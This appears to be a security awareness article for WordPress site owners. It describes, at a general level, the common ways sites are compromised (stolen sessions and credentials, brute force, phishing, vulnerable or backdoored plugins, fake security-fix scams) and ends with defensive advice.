How do WordPress sites actually get hacked?

Attacks against websites are overwhelmingly automated. These bots don’t care how big or small your website is—they scan the entire internet for known weaknesses and exploit them at scale.

For cybercriminals seeking monetary gain or exposure, every hacked site adds to their profit, especially when thousands are compromised in one sweep.

1. Compromised privileged accounts

The first and most common way hackers breach WordPress sites is by gaining access to privileged accounts, particularly administrator accounts. Once in, they can install fake or vulnerable plugins and upload malware with ease.

Here are the most typical methods:

Session hijacking

Session cookies allow you to stay logged in without re-entering credentials. But if these cookies are stolen—often through info-stealer malware on an infected device—hackers bypass login screens and even multi-factor authentication.

These cookies are traded in marketplaces for a high price, especially from compromised devices.

Leaked credentials

Many users reuse the same password across platforms. Once a single site is breached and user credentials are leaked, attackers try those same combinations elsewhere. Credential dumps are a goldmine for hackers, often containing email and password pairs in plaintext.

Once a single site is breached and user credentials are leaked, attackers try those same combinations elsewhere.

Check if your credentials have leaked

Brute force attacks

Automated bots guess login credentials using massive wordlists, often comprised of previously leaked passwords. These attacks are loud and easy to detect, so they’re often spread across a botnet to avoid detection.

Phishing

Fake login pages that mimic legitimate WordPress sites are used to trick admins into entering their credentials. These phishing campaigns are often hosted on already compromised sites and can be very convincing, especially with lookalike domain names.

👉 Remember: Administrator accounts aren’t the only danger zone. Hosting, FTP/SFTP, and even remote management tools can become vectors.

2. Software vulnerabilities

The WordPress core is considered very secure. But your site likely runs a mix of plugins and themes from various developers, and that’s where things get messy.

There are over 60,000 plugins and themes in the WordPress repository, and tens of thousands more in premium marketplaces like Envato or Monsterone. Many of these are developed by individuals or small teams with varying levels of experience, and little to no code review.

Vulnerabilities in core vs plugins

While rare, the WordPress core has had serious vulnerabilities in the past, like the REST API flaw in 2017 that resulted in mass defacements.

However, plugin and theme vulnerabilities are far more frequent and widely exploited.

Bug bounties & security trends

Since the launch of bug bounty programs like Patchstack’s in 2020, the number of discovered plugin vulnerabilities has skyrocketed—from 582 in 2020 to over 4500 in 2022 alone.

The number of discovered plugin vulnerabilities has skyrocketed—from 582 in 2020 to over 4500 in 2022 alone.

Automated bots now monitor the WordPress plugin repository for changes indicating a security fix and launch attacks within hours.

Zero-day vs 1-day vulnerabilities

• Zero-day: Known to hackers before developers can patch.
• 1-day: Publicly disclosed after a fix is released, but exploited before users apply the update.

Most real-world attacks target 1-day vulnerabilities.

Updates alone are not enough—many affected plugins never receive a patch at all.

3. Malicious plugins and social engineering

Sometimes, the plugins themselves are the attack.

Nulled plugins and themes

Pirated “premium” plugins are intentionally distributed with embedded malware. They work as advertised—until you realize they’ve opened backdoors into your site. This tactic exploits people’s desire to save money and “get something for free.”

One such operation, WP-VCD, was notorious for spreading these backdoored plugins at scale.

Plugins with built-in backdoors

Some developers build backdoor access into their plugins out of malice or convenience. 🤷🏻 This can happen when a plugin changes hands or the original author adds features intended for support but exploitable by hackers.

Scams that exploit fear

Hackers also impersonate trusted sources—like the WordPress core team—claiming a critical flaw needs to be patched with a special plugin.

Unsuspecting users install malware thinking they’re protecting their site.

Check this video:

Final thoughts: most hacks start with a click or a missed update

Most compromises trace back to basic decisions, whether it’s weak passwords, outdated plugins, or a free download that was too good to be true. And unfortunately, there’s no firewall for human error.

Stick to trusted software sources, support the developers who maintain secure code, and stay vigilant with updates and monitoring. That’s how you turn your WordPress site from low-hanging fruit into a hard target.